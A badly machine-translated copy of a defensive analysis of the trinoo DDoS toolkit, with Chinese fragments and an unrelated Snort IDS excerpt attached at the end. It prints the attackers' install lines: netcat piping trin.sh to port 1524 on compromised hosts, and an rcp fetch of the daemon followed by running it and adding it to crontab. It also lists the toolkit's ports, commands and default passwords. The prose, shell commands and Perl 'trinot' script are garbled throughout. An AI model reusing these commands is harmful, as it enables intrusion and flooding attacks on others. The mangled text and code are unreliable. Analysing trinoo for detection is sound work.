This article is a denial of service attack tool kit trinoo in master / slave server of some analysis.
Trinoo daemon binary code package was initially in a number of Solaris 2.x hosts found in these hosts is to use RPC service attack vulnerability "statd", "cmsd" and "ttdbserverd" invasion. On the details of these vulnerabilities, please see the CERT record of 99-04 events:
http://www.cert.org/incident_notes/IN-99-04.html
Trinoo initial daemon from some UDP-based access control protocol and remote command shell, and is likely to automatically record comes with a sniffer (sniffer).
Look at the tool kit in the process, capture the attack Trinoo network installation process and some source code. We use these to capture the source code to enter an in-depth analysis.
Of these source code of any modifications, such as prompts, passwords, commands, TCP / UDP port number or supported attack methods, signatures, and specific functions, can enable the analysis of different results in this article.
The daemon is a Solaris 2.5.1 and Red Hat Linux 6.0 and run the compiler. Master server (master) in the Red Hat Linux 6.0 and run the compiler. But perhaps the main server daemon, and can be used in other similar platform.
Trinoo network may contain hundreds or even thousands of Taiwan has been the invasion of the composition of Internet hosts. These hosts are likely to have been fitted with a variety of "back door" to facilitate the re-entry into the system.
In August 17, 1999, a host at least 227 (of which 114 belong to Internet2 host), composed of trinoo network attacks at Minnesota (Minnessota) of a host university, and the result is the collapse of the host network of more than 2 days . And during the attack in the investigation, and at least 16 other hosts to be attacked, including some outside the United States host. (Please refer to Appendix D in order to understand the report of the attack trinoo.
Attack the course
The course of a typical attack is likely to be like this:
1)一个盗取来的帐号被用于编译各种扫描工具、攻击工具(如缓冲区溢出程序)、rootkit和sniffer、trinoo守护程序、主服务器、入侵主机、目标主机清单等等。 The system usually has a lot of users, the existence of loopholes in management and high-speed connection speed (for file transfer) of the large mainframe systems.
2) and then for a wide range of network scan to determine the potential target of the invasion. The most likely those who may have a variety of remote buffer overflow vulnerability of the host, such as wu-ftpd, RPC services (cmsd, statd, ttdbserverd, amd) and so on. They host the best operating system is Sun Solaris 2.x and Linux, in order to take full advantage of a variety of ready-made, such as rootkits and backdoors. If it is other systems can be used to preserve and record tool.
3) invasion of the host list has been the preparation of the achievement of the invasion attacks, monitor TCP port (usually 1524 "ingreslock") and connect to the port in order to determine the success of the invasion script. Or by sending a free e-mail to the WEB-mail to confirm that the host has been invaded.
Invasion after the completion of a "controlled" host list of host will be used to place a backdoor, sniffer or trinoo daemon or trinoo master server.
4) invasion of the system from the list of selected trinoo network to meet the needs of the establishment of the host, has compiled a good place trinoo daemon.
5) Finally, run the DoS attack script, the script has been established in accordance with the above list of invasion of the host to generate an additional script, in the background to automatically install the fastest speed. Script to use "netcat" will be sent to the shell scripts have been hacked host port 1524/tcp.
. / Trin.sh nc 128.aaa.167.217 1524 &
. / Trin.sh nc 128.aaa.167.218 1524 &
. / Trin.sh nc 128.aaa.167.219 1524 &
. / Trin.sh nc 128.aaa.187.38 1524 &
. / Trin.sh nc 128.bbb.2.80 1524 &
. / Trin.sh nc 128.bbb.2.81 1524 &
. / Trin.sh nc 128.bbb.2.238 1524 &
. / Trin.sh nc 128.ccc.12.22 1524 &
. / Trin.sh nc 128.ccc.12.50 1524 &
...
Which "trin.sh" script generated the following output:
echo "rcp 192.168.0.1: leaf / usr / sbin / rpc.listen"
Echo "echo rcp is done moving binary"
Echo "chmod + x / usr / sbin / rpc.listen"
Echo "echo launching trinoo"
Echo "/ usr / sbin / rpc.listen"
Cron "
Echo "crontab cron"
Echo "echo launched"
Echo "exit"
From time to time to check if crontab file, you can easily monitor whether or not the host has been invaded trinoo.
In other systems also found another way: the name of daemon was changed to "xterm", and then run it through the script.
Cd / var/adm/.1
PATH =.: $ PATH
Export PATH & 1
Guardian in the proceedings by running the script to complete the establishment of a network trinoo is entirely possible.
More subtle method is to let trinoo daemon / master server in a given wake-up time was running, and open to monitor the TCP or UDP port.
The entire installation process automatically allow an attacker in a very short period of time, the use of a large number of the invasion of the host to establish a network denial of service attacks.
6) as an option, rootkit is often installed into the system to hide the attacks, files, and network connections. This is the main server system to run more important, because it is the core of the network trinoo. (Note: In many cases, the main server is often installed in the Internet service provider (ISP) domain name server, DNS server a large number of communications traffic, a large number of TCP / UDP connections, for covert trinoo network connections, the attack process and documents to help provide very favorable. (In addition, unless it can determine the existence of the domain name server acts of denial of service tool, or system administrator is generally not easily interrupted to carry out safety inspection service.)
Rootkits may also install a sniffer in the use of the system, such as the "hunt" (TCP / IP session monitor) can be directly tapped, such as the details of network communication procedures. This will end any process through remote buffer overflow to enter the system. :)
To get more information on rootkits, visit the following websites:
http://staff.washington.edu/dittrich/faq/rootkits.faq
Target host
Trinoo network from the main server (master.c) and trinoo daemon (ns.c) component. Trinoo a typical network structure is as follows:
Control of the attacker is often one or more of the "main server" server, and each a "master server" server control a number of "daemon" (we can call radio host "Bcast / broadcast"). All orders received by use daemon attack packets at the same time attacked one or more target host system.
Trinoo how to achieve this function? Attack and the main server through the "telnet" protocol to establish TCP connection, and a password by sending a command to attack, the realization of large-scale, high-volume, concurrency of denial of service attacks.
Communications port
Attacker to the master server: 27665/TCP
Master server to daemon: 27444/UDP
To the main server daemon: 31335/UDP
Trinoo main server through the remote control 27665/TCP ports in the establishment of the TCP connection. After the connection is established, the user must provide the correct password ( "betaalmostdone"). If the authentication has been adopted by another of the connection is established, then a connecting IP address is included in the warning message will be sent to connected hosts (to provide the IP address seems to be wrong, but still send a warning message). There is no doubt that this feature eventually will be able to complete the realization of the attacker given enough time to clear before leaving traces.
From the main server to trinoo Daemon connection port in the achievement of 27444/UDP. Command line format is as follows:
Arg1 password arg2
Which the default password is "l44adsl", only contains the password sub-string "l44" the command line will be executed.
Trinoo daemon from the server to connect to the main 31335/UDP port in the achievement.
When the daemon starts, it will send initialization string "* HELLO *" to the main server. The main server (through the "sniffit" capture procedures) have been recorded and the maintenance of a list of activation daemon:
UDP Packet ID (from_IP.port-to_IP.port): 192.168.0.1.32876-10.0.0.1.31335
45 E 00. 00. 23 # B1. 5D] 40 @ 00. F8. 11. B9. 27. C0. A8. 00. 01.
0A. 00. 00. 01. 80. 6C l 7A z 67 g 00. 0F. 06. D4. 2A * 48 H 45 E 4C L
4C L 4F O 2A *
If the main server through trinoo port 27444/UDP sent to a daemon "png" command, the daemon will send 31335/UDP port to the "png" command to return to the host string "PONG":
UDP Packet ID (from_IP.port-to_IP.port): 10.0.0.1.1024-192.168.0.1.27444
45 E 00. 00. 27 '1A. AE. 00. 00. 40 @ 11. 47 G D4. 0A. 00. 00. 01.
C0. A8. 00. 01. 04. 00. 6B k 34 4 00. 13. 2F / B7. 70 p 6E n 67 g 20
6C l 34 4 34 4 61 a 64 d 73 s 6C l
UDP Packet ID (from_IP.port-to_IP.port): 192.168.0.1.32879-10.0.0.1.31335
45 E 00. 00. 20 13. 81. 40 @ 00. F8. 11. 57 W 07. C0. A8. 00. 01.
0A. 00. 00. 01. 80. 6F o 7A z 67 g 00. 0C. 4E N 24 $ 50 P 4F O 4E N 47 G
Password protection
Master servers and daemon have password protection, to prevent the system administrator (or other hackers organizations) by the trinoo control over the network. Password using the crypt () encryption function. This is a symmetric encryption method. Encrypted password stored in the main server has been compiled and guard procedures, and to express the way in the network transmission of the password comparison (current version is not encrypted communications session, so it is not difficult to intercept in the main server to send TCP control session Password express.
Run-time initialization, the main guardian of the process of prompt appears, enter the password will be waiting. If the password is not correct, exit the procedure; if the password is correct, prompt process is running, and then have a child process to run in the background, and finally to withdraw from:
#. / Master
?? Wrongpassword
#
...
#. / Master
?? GOravev1.07d2 + f3 + c [Sep 26 1999:10:09:24]
#
And such like a, when the port to connect to a remote command (27665/TCP), you also must enter a password:
Attacker $ telnet 10.0.0.1 27665
Trying 10.0.0.1
Connected to 10.0.0.1
Escape character is'^]'.
Kwijibo
Connection closed by foreign host.
...
Attacker $ telnet 10.0.0.1 27665
Trying 10.0.0.1
Connected to 10.0.0.1
Escape character is'^]'.
Betaalmostdone
Trinoo v1.07d2 + f3 + c.. [Rpm8d/cb4Sx /]
From the main server is sent to the daemon trinoo certain there will be password-protected command. These passwords in the main server and the daemon to send the form again explicitly.
Default password is as follows:
"L44adsl" trino Daemon Password
"gOrave" trinoo master server to start (hint "??")
"betaalmostdone" trinoo master server remote interface password
"killme" trinoo master server control orders "mdie" Password Authentication
Master server command
Rinoo master server supports the following command:
Die closure of the main server
Quit from the main server log
DoS settings mtimer N for N seconds timer. N values ranging from 1-1999 seconds. If N <1,2000, the default value of 500 is used.
If the password authentication mdie pass through, then stop all broadcast (Bcast) host. Order
"d1e 144adsl" was sent to each host a radio so that they stop. This life
The need for a separate password.
PING command mping Send "png 144adsl" to each of the radio host has been activated.
Mdos
To each host a radio order to send more than DoS attacks
( "Xyz 144adsl 123: ip1: ip2: ip3").
Print version info and compile information. Such as:
This is the "trinoo" AKA DoS Project master server version v1.07d2 + f3 + c
Compiled 15:08:41 Aug 16 1999
DoS attack msize set up to use the buffer size of data packets.
nslookup host on the specified host name to query.
try to clear the deadlock killdead radio host. First of all, to all known radio host
"Shi l44adsl" command. (Any state in the activation daemon will be back
Send initialization string "* HELLO *". ) And then (through the-b parameter) to amend Canton
Host broadcast the names of the list of documents. Such as "* HELLO *" after the package has been received to re -
New initialization.
usebackup to switch to from "killdead" ordered the establishment of the radio host backup file.
list all activated bcast radio host.
help [cmd] or order the help of server information,
mstop trying to stop a DoS attack (this has not yet realized, but are listed in the help command.)
Daemon commands
Trinoo daemon supports the following command:
aaa pass IP to attack the designated IP address. At a fixed time interval (default is 120 seconds, or
"bbb" command set the value of 1-1999) to the designated IP address of a random UDP port
(0-65534) to send UDP packets. Packet size is determined by the "rsz" order, the
Default of 1000 bytes. Daemon noo
DoS attacks rsz N set the buffer size to N bytes. (Trinoo transfer daemon
Using malloc () the distribution of the size of the buffer zone, and then send random packets
Offensive content. )
Xyz pass 123: ip1: ip2: ip3
A number of DoS attacks. Similar to "aaa" command, but they can attack a number of IP addresses at the same time.
Tool characteristics
-----------
The installation of the most commonly used method trinoo daemon is added in the system crontab items, so that daemons are able to run every minute. Crontab file will be found to check the following:
* * * * * / Usr / sbin / rpc.listen
The main server program will create a radio host that contains a list of the files (default file name is "...")。 If you use the "killdead", the document "..." to send all the guardian of "shi" daemon command to bring them all of the main server to send initialization string "* HELLO *". The list of documents and then have to change its name (the default for "...- b "), and sent each a" * HELLO * "string (activated state) of the daemon to generate a list of new documents.
Source code ( "master.c") line contains the following procedures:
...
/ * Crypt key encrypted with the key 'bored' (so hex edit cannot get key easily?)
Comment out for no encryption ... * /
# Define CRYPTKEY "ZsoTN.cq4X31"
...
If the program compiler know when CRYPTKEY variables specified, the radio host's IP address will be encrypted using the Blowfish algorithm:
# Ls-l ... ...-b
-rw ------- 1 root root 25 Sep 26 14:46 ...
-rw ------- 1 root root 50 Sep 26 14:30 ...- b
# Cat ...
JPbUc05Swk/0gMvui18BrFH /
# Cat ...- b aE5sK0PIFws0Y0EhH02fLVK.
JPbUc05Swk/0gMvui18BrFH /
Assumptions do not use the rootkit to hide processes, the main server can show the following characteristics of the network socket fingerprint (of course, the name and path name will vary.):
# Netstat-a - inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
Tcp0 0 *: 27665 *: * LISTEN
...
Udp0 0 *: 31335 *: *
...
# Lsof egrep ": 31335:27665"
master 1292 root3u inet 2460 UDP *: 31335
master 1292 root4u inet 2461 TCP *: 27665 (LISTEN)
# Lsof-p 1292
COMMAND PID USER FD TYPE DEVICESIZE NODE NAME
master 1292 root cwdDIR3, 11024 14356 / tmp / ...
Master 1292 root rtdDIR3, 11024 2 /
master 1292 root txtREG3, 1 30492 14357 / tmp / ... / master
master 1292 root memREG3, 1 342206 28976 / lib/ld-2.1.1.so
master 1292 root memREG3, 1 63878 29116 / lib/libcrypt-2.1.1.so
master 1292 root memREG3, 1 4016683 29115 / lib/libc-2.1.1.so
master 1292 root0u CHR4, 1 2967 / dev/tty1
master 1292 root1u CHR4, 1 2967 / dev/tty1
master 1292 root2u CHR4, 1 2967 / dev/tty1
master 1292 root3u inet 2534 UDP *: 31335
master 1292 root4u inet 2535 TCP *: 27665 (LISTEN)
And run the daemon of the system will display the following fingerprint:
# Netstat-a - inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
...
Udp0 0 *: 1024 *: *
Udp0 0 *: 27444 *: *
...
# Lsof egrep ": 27444"
ns 1316 root3u inet 2502 UDP *: 27444
# Lsof-p 1316
COMMAND PID USER FD TYPE DEVICESIZE NODE NAME
ns 1316 root cwdDIR3, 11024 153694 / tmp / ...
Ns 1316 root rtdDIR3, 11024 2 /
ns 1316 root txtREG3, 16156 153711 / tmp / ... / ns
ns 1316 root memREG3, 1 342206 28976 / lib/ld-2.1.1.so
ns 1316 root memREG3, 1 63878 29116 / lib/libcrypt-2.1.1.so
ns 1316 root memREG3, 1 4016683 29115 / lib/libc-2.1.1.so
ns 1316 root0u CHR4, 1 2967 / dev/tty1
ns 1316 root1u CHR4, 1 2967 / dev/tty1
ns 1316 root2u CHR4, 1 2967 / dev/tty1
Ns 1316 root3u inet 2502UDP *: 27444
Ns 1316 root4u inet 2503UDP *: 1024
Defense
Of course, the best defense is to prevent the invasion and the first root-level security threats, so that your system will not be installed on the main server trinoo / guardian of the server. In an ideal world, all systems are playing all the patches, it is safe and is being monitored, intrusion monitoring systems and firewalls can monitor and refused to attack the success of the packet, and I is a six-month living in Barry Island, six months living in the French Alps millionaire. :) But in the real world, it can not be achieved (at least in the foreseeable future).
If your network may have been installed in the operation of a number of trinoo daemon, and is always ready to carry out DoS attacks on other systems, how to find and stop them?
Because these procedures in the communications and attack the high-level use UDP port, in order to direct blockage of these communications is very difficult (but not impossible), unless you update the UDP port to use high-level procedures.
The most simple checks for the presence of the main server and trinoo daemon is probably the way to the Ethernet in the data segment shared a close watch on all of the UDP packet to find mentioned in this article on the main server daemon communication with tags. Unfortunately, these activities can only be in the target host DoS attack / after are likely to be discovered and detected.
If there is any doubt the existence of ongoing system trinoo attack daemon on the daemon running in the Solaris system to run "truss" program will receive the following output:
...
getmsg (3, 0xEFFFF830, 0xEFFFF83C, 0xEFFFF81C) = 0
getmsg (3, 0xEFFFF830, 0xEFFFF83C, 0xEFFFF81C) (sleeping. ..)
getmsg (3, 0xEFFFF830, 0xEFFFF83C, 0xEFFFF81C) = 0
Time () = 938385467
Open ( "/ dev / udp", O_RDWR) = 5
Ioctl (5, I_PUSH, "sockmod") = 0
Ioctl (5, I_STR, 0xEFFFF748) = 0
Ioctl (5, I_SETCLTIME, 0xEFFFF7FC) = 0
Ioctl (5, I_SWROPT, 0x00000002) = 0
sigprocmask (SIG_SETMASK, 0xEFFFF7EC, 0xEFFFF7DC) = 0
Ioctl (5, I_STR, 0xEFFFF660) = 0
sigprocmask (SIG_SETMASK, 0xEFFFF7DC, 0xEFFFF7B8) = 0
sigprocmask (SIG_BLOCK, 0xEFFFF548, 0xEFFFF5C0) = 0
Ioctl (5, I_STR, 0xEFFFF548) = 0
sigprocmask (SIG_SETMASK, 0xEFFFF5C0, 0x00000000) = 0
Putmsg (5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
Time () = 938385467
Putmsg (5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
Time () = 938385467
Putmsg (5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
Time () = 938385467
Putmsg (5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
Time () = 938385467
Putmsg (5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
Time () = 938385467
Putmsg (5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
Time () = 938385467
Putmsg (5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
Time () = 938385467
Putmsg (5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
Time () = 938385467
Putmsg (5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
Time () = 938385467
Putmsg (5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
Time () = 938385467
...
When a single target attacks, the use of "tcpdump" to monitor network traffic has the following output:
# Tcpdump ip host 192.168.0.1
... 192.168.0.1.27444: udp 25 216.160.XX.YY.16838: udp 4 (DF) 216.160.XX.YY.5758: udp 4 (DF) 216.160.XX.YY.10113: udp 4 (DF) 216.160.XX.YY.17515: udp 4 (DF) 216.160.XX.YY.31051: udp 4 (DF) 216.160.XX.YY.5627: udp 4 (DF) 216.160.XX.YY.23010: udp 4 ( DF) 216.160.XX.YY.7419: udp 4 (DF) 216.160.XX.YY.16212: udp 4 (DF) 216.160.XX.YY.4086: udp 4 (DF) 216.160.XX.YY.2749: udp 4 (DF) 216.160.XX.YY.12767: udp 4 (DF) 216.160.XX.YY.9084: udp 4 (DF) 216.160.XX.YY.12060: udp 4 (DF) 216.160.XX.YY.32225 : udp 4 (DF)
...
Deficiencies and weaknesses
The first flaw is the use of crypt () password encryption function, and can be intercepted by the main server and communication between the daemon information and return to the prompt string.
This will enable you to identify the existence of the main server or daemon, to determine the existence of this article referred to the default password, they may let you through the decryption of the password to access some (or all) trinoo network control.
However, if the source code by an attacker who modified clever, you might have to crack the password, or use a hex / ASCII editor to amend the document binary code sequence of commands to get the main program / daemon list host.
If the source code is very fortunate to have not been modified, you can search for files in the default installation of string to find a password:
# Strings - ns
...
Socket
Bind
Recvfrom
% S% s% s
aIf3YWfOhw.V .<=== crypt () encrypted password "l44adsl"
PONG
* HELLO *
...
# Strings - master
...
--- V
V1.07d2 + f3 + c
Trinoo% s
l44adsl <=== clear text version of daemon password
Sock
0nm1VNMXqRMyM <=== crypt () encrypted password "gOrave"
10:09:24
Sep 26 1999
Trinoo% s [% s:% s]
Bind
Read
* HELLO *
ZsoTN.cq4X31 <=== CRYPTKEY
Bored
NEW Bcast -% s
PONG
PONG% d Received from% s
Warning: Connection from% s
beUBZbLtK7kkY <=== crypt () encrypted password "betaalmostdone"
Trinoo% s.. [Rpm8d/cb4Sx /]
...
DoS: usage: dos
DoS: Packeting% s.
Aaa% s% s
Mdie
ErDVt6azHrePE <=== crypt () encrypted password for "mdie" command
Mdie: Disabling Bcasts.
D1e% s
Mdie: password?
...
The second defect is greater in the network to explicitly send the password daemon. Assuming you know the main server and the client (daemon) to connect the UDP port number, you can use "sniffit", "ngrep", "tcpdump" or other network monitoring procedures for cut-off
UDP packets were of the password (Appendix A is a use "ngrep" example).
For example: The following are through "sniffit" intercepted include "png" command packet contents:
UDP Packet ID (from_IP.port-to_IP.port): 10.0.0.1.1024-192.168.0.1.27444
45 E 00. 00. 27 '1A. AE. 00. 00. 40 @ 11. 47 G D4. 0A. 00. 00. 01.
C0. A8. 00. 01. 04. 00. 6B k 34 4 00. 13. 2F / B7. 70 p 6E n 67 g 20
6C l 34 4 34 4 61 a 64 d 73 s 6C l
As mentioned earlier, trinoo master server "mdie" command is password protected. There are several ways to break it.
If you can use the UNIX command "strings" to find the encrypted password, and perhaps can be used to decrypt a password cracking tools (see Appendix C). While this method may break a very long time (if the password strength of words), it is feasible. (We have a Pentium II machine to spend less than 30 seconds to break out on the "mdie" command is the password "kellme".)
You might also try to attack the main server and the network between the tapping password, but if you need the password of the command does not always (or even never) be executed, then the difficulty will be immense.
You may be lucky enough to password interception procedures to guard, as most commands need it. This may appear in the daemon-side or server-side of the main network (the two servers may be two completely different types of networks) in the. Daemon client in the interception of network is more desirable since the number of daemon data more than the main server. Another reason is that many of the main server was found in the main domain name server is running, the host of the high-level data flow UDP port where the host daemon than the data traffic is much greater, will increase the difficulty of tapping a lot. In addition, when you find a site running in a number of daemon, which often means that you can completely determine the system is invaded. :)
Once you've found a daemon, you will be able to access the main server where the IP address list (available through "strings" command). You should immediately administrator through these sites in detail for its host intrusion detection system. (If the attacker uses the rootkit, you may need to consult a professional security company and experts.)
If it is found that the main server daemon can be in their list of document procedures for all the IP address of guardian (if the case had not been encrypted). However, if the file is encrypted, you use the compiler to a file or the password to decrypt the keyword (the Blowfish algorithm for encryption algorithm), or control of the master server and use the "bcast" command to obtain a list of activation daemon.
If you found a server with the main activities of the conversation (the conversation is a "telnet" the TCP session), you can use the "hunt" program intercepted the conversation, and run the command. Although do not know "mdie" command password, can not directly stop all the daemons, but you can use the "bcast" command to obtain a list of all daemon. (As the list may contain a very large list, it is recommended to achieve the preparation of the command script.)
Once you know all the daemon's IP address, and password daemon, you can send a command string that contains the correct data of the UDP outsourcing trinoo any suspicious daemon. LibNet, Spak and Perl Net:: RawIP database tools such as structure and can be used to send UDP packets. (One uses the Net:: RawIP the Perl script "trinot" dedicated to the completion of this work. Please refer to Appendix B.)
Because the daemon process of a typical installation of the system to add a minute to run automatically every entrance of the crontab, you should remove them completely to prevent its re-run.
In tapping your network that contains the string "* HELLO *", "PONG" or any other characteristics of the UDP packet strings can also prove that daemon has been installed to the network. Note that this applies to the source code unmodified version. The following is a "ngrep" program to capture the success of the examples:
# Ngrep-i-x "* hello * pong" udp
interface: eth0 (192.168.0.200/255.255.255.0)
Filter: ip and (udp)
Match: * hello * pong
...
# 10.0.0.1:31335
2a 48 45 4c 4c 4f 2a * HELLO *
# # # 10.0.0.1:31335
50 4f 4e 47 PONG 10.0.0.1:31335
50 4f 4e 47 PONG 10.0.0.1:31335
50 4f 4e 47 PONG
...
Even if they do not have any weaknesses trinoo, but still trinoo network can find its weaknesses.
As mentioned earlier, some systems use a crontab to run the daemon, this is a very clear marker.
Trinoo network to automatically install script using the Berkeley of the "rcp" command. As long as the system to the network to monitor the external IP address "rcp" connections (514/TCP), can be determined quickly. (Note: The script used in "rcp" the need for a relationship of trust between the host, often in the user's ~ /. Rhosts file contains "+ +." By checking the document can be immediately aware of the possibility of a system intrusion. )
(For further analysis trinoo Please refer to Appendix E, by George Weaver of Pennsylvania State University and David Brumley of Stanford niversity prepared "more trinoo monitoring method" article.)
Appendix A: "ngrep" network session capture
The following is a "ngrep" attack to capture a conversation examples:
# Ngrep-x ".*" tcp port 27665 or udp port 31335 or udp port 27444
interface: eth0 (192.168.0.200/255.255.255.0)
filter: ip and (tcp port 27665 or udp port 31335 or udp port 27444)
Match: .*
# 10.0.0.1:31335
2a 48 45 4c 4c 4f 2a * HELLO *
# 10.0.0.1:27665 [AP]
Ff f4 ff fd 06 .....
###### 10.0.0.1:27665 [AP]
62 65 74 61 61 6c 6d 6f73 74 64 6f 6e 65 0d 0abetaalmostdone ..
# 192.168.100.1:1074 [AP]
74 72 69 6e 6f 6f 20 7631 2e 30 37 64 32 2b 66trinoo v1.07d2 + f
33 2b 63 2e 2e 5b 72 706d 38 64 2f 63 62 34 533 + c.. [Rpm8d/cb4S
78 2f 5d 0a 0a 0a x /]...
# # 192.168.100.1:1074 [AP]
# # # 10.0.0.1:27665 [AP]
62 63 61 73 74 0d 0a bcast ..
# 192.168.100.1:1074 [AP]
4c 69 73 74 69 6e 67 2042 63 61 73 74 73 2e 0aListing Bcasts ..
0a.
# # # 192.168.100.1:1074 [AP]
31 39 32 2e 31 36 38 2e30 2e 31 2e 20 20 20 0a192.168.0.1.
0a 45 6e 64 2e 20 31 2042 63 61 73 74 73 20 74.End. 1 Bcasts t
# # 10.0.0.1:27665 [AP]
6d 74 69 6d 65 72 20 3130 30 30 0d 0a mtimer 1000 ..
# # 192.168.100.1:1074 [AP]
6d 74 69 6d 65 72 3a 2053 65 74 74 69 6e 67 20mtimer: Setting
74 69 6d 65 72 20 6f 6e20 62 63 61 73 74 20 74timer on bcast t
6f 20 31 30 30 30 2e 0a o 1000 ..
# 192.168.0.1:27444
62 62 62 20 6c 34 34 6164 73 6c 20 31 30 30 30bbb l44adsl 1000
# # 192.168.100.1:1074 [AP]
6d 74 69 6d 65 72 3a 2053 65 74 74 69 6e 67 20mtimer: Setting
74 69 6d 65 72 20 6f 6e20 62 63 61 73 74 20 74timer on bcast t
6f 20 31 30 30 30 2e 0a o 1000 ..
# # # 192.168.100.1:1074 [AP]
# # # 10.0.0.1:27665 [AP]
6d 73 69 7a 65 20 33 3230 30 30 0d 0a msize 32000 ..
# 192.168.0.1:27444
72 73 7a 20 33 32 30 3030 rsz 32000
# 192.168.100.1:1074 [AP]
# # # 10.0.0.1:27665 [AP]
64 6f 73 20 32 31 36 2e31 36 30 2e 58 58 2e 59dos 216.160.XX.Y
59 0d 0a Y..
# 192.168.100.1:1074 [AP]
44 6f 53 3a 20 50 61 636b 65 74 69 6e 67 20 32DoS: Packeting 2
31 36 2e 31 36 30 2e 5858 2e 59 59 2e 0a 16.160.XX.YY..
# 192.168.0.1:27444
61 61 61 20 6c 34 34 6164 73 6c 20 32 31 36 2eaaa l44adsl 216.
31 36 30 2e 58 58 2e 5959 160.XX.YY
# 192.168.100.1:1074 [AP]
# # 10.0.0.1:27665 [AP]
71 75 69 74 0d 0a quit ..
# 192.168.100.1:1074 [AP]
62 79 65 20 62 79 65 2e0a bye bye ..
# # # 10.0.0.1:27665 [AP]
62 65 74 61 61 6c 6d 6f73 74 64 6f 6e 65 0d 0abetaalmostdone ..
# # 192.168.100.1:1075 [AP]
74 72 69 6e 6f 6f 20 7631 2e 30 37 64 32 2b 66trinoo v1.07d2 + f
33 2b 63 2e 2e 5b 72 706d 38 64 2f 63 62 34 533 + c.. [Rpm8d/cb4S
78 2f 5d 0a 0a 0a x /]...
# # # 192.168.100.1:1075 [AP]
# # # 10.0.0.1:27665 [AP]
6d 70 69 6e 67 0d 0a mping ..
# # 192.168.100.1:1075 [AP]
6d 70 69 6e 67 3a 20 5365 6e 64 69 6e 67 20 61mping: Sending a
20 50 49 4e 47 20 74 6f20 65 76 65 72 79 20 42 PING to every B
63 61 73 74 73 2e 0a casts ..
# 192.168.0.1:27444
70 6e 67 20 6c 34 34 6164 73 6c png l44adsl
# # 10.0.0.1:31335
50 4f 4e 47 PONG
# # 192.168.100.1:1075 [AP] PONG 1 R
65 63 65 69 76 65 64 2066 72 6f 6d 20 31 39 32eceived from 192
2e 31 36 38 2e 30 2e 310a .168.0.1
# # 10.0.0.1:27665 [AP]
71 75 69 74 0d 0a quit ..
# 192.168.100.1:1075 [AP]
62 79 65 20 62 79 65 2e0a bye bye ..
Appendix B - Trinot script
------------------------------- Cut here ----------------- ------------------
#! / Usr / bin / perl-w
#
# Trinot v. 1.1
# By Dave Dittrich
#
# Send commands to trinoo daemon (s), causing them to PONG, * HELLO *
# To all their masters, exit, etc. Using this program (and knowledge
# Of the proper daemon password), you can affect trinoo daemons
# Externally and monitor packets to verify if the daemons are up,
# Expose their masters, or shut them down.
#
# Needs Net:: RawIP (http://quake.skif.net/RawIP)
# Requires libpcap (ftp://ftp.ee.lbl.gov/libpcap.tar.Z)
#
# Example:. / Trinot host1 [host2 [...]]
#. / Trinot-S host
#. / Trinot-p password-P host
#
# (This code was hacked from the "macof" program, written by
# Ian Vitek)
Require 'getopts.pl';
Use Net:: RawIP;
{}});
Chop ($ hostname = `hostname`);
Getopts ( 'PSDp: f: s: d: l: i: vh');
die "usage: $ 0 [options] host1 [host2 [...]] \ tP \ t \ t \ tSend \" png \ "command \ tS \ t \ t \ tSend \" shi \ "command \ tD \ t \ t \ tSend \ "d1e \" command (default) \ tp password \ t \ t (default: \ "l44adsl \")
\ tf from_host \ t \ t (default: $ hostname) \ ts src_port \ t \ t (default: random) \ td dest_port \ t \ t (default: 27444) \ tl ipfile \ t \ tSend to IP addresses in ipfile \ ti interface \ t \ tSet sending interface (default: eth0) \ tv \ t \ t \ tVerbose \ th This help \ n "unless (! $ opt_h);
# Set default values
$ Opt_i = ($ opt_i)? $ Opt_i: "eth0";
$ s_port = ($ opt_s)? $ opt_s: int rand 65535;
$ D_port = ($ opt_d)? $ Opt_d: 27444;
$ Pass = ($ opt_p)? $ Opt_p: "l44adsl";
# Choose network card
If ($ opt_e) ($ opt_e);
) Else (ethnew ($ opt_i);
)
$ Cmd = ($ opt_P)? "Png $ pass":
($ Opt_S)? "Shi $ pass":
($ Opt_D)? "D1e $ pass":
"D1e $ pass";
$ S_host = ($ opt_f)? $ Opt_f: $ hostname;
If ($ opt_l) (
open (I, "<$ opt_l") die "could not open file: '$ opt_l'";
While () (
Chop;
Push (@ ARGV ,$_);
)
Close (I);
)
Foreach $ d_host (@ ARGV) ($ d_host), $ cmd)
));
print "sending '$ cmd' to $ d_host \ n" if $ opt_v; send;
)
Exit (0);
------------------------------- cut here -----------------------------------
附录C - 参考文摘
TCP/IP Illustrated, Vol. I, II, and III. W. Richard Stevens and Gary
R. Wright., Addison-Wesley.
lsof:
ftp://vic.cc.purdue.edu/pub/tools/unix/lsof/
tcpdump:
ftp://ftp.ee.lbl.gov/tcpdump.tar.Z
阅读全文...
Snort intrusion prevention Linux installation and configuration
Intrusion Detection System (IDS) is a computer and network systems of the malicious use of resources to identify and respond to acts of the processing system, such as radar warning, as it will not be affected, under the premise of network performance on network security, detection, from the computer A number of key points of the network to gather information, through
Analysis of this information to see whether there is any breach of network security strategy and the signs of attack, which extends the system administrator's security management capabilities, improved information security and integrity of infrastructure. In general, IDS is added as a firewall, the IDS is generally behind a firewall, network activity can be detected in real time, and according to the circumstances and the prohibition of network activity records.
IDS Intrusion Detection System based on the focus of the work different, can be divided into host-based intrusion detection system and network-based intrusion detection system. Constitutes a general intrusion detection system is divided into two parts one part is part of detection (Sensor), part of the police to deal with the results of the console. Different composition of the intrusion detection in general is not the same as the console and the Sensor are two basic parts, host-based intrusion detection in most of the host agent is installed on a system to collect information to report to the Sensor.
Detection of Intrusion Detection System through its own sources of information are part of Sensor Detection received.
Network-based intrusion detection, mainly through the interception of network packet analysis to find offensive and undesirable characteristics of the data packet attempts. In network-based Intrusion Detection System Sensor part of the testing are generally arranged in a mirror-port switch (or a common arbitrary port HUB), flows through the network to listen to all packets, the packets to find matches to be invaded source of information.
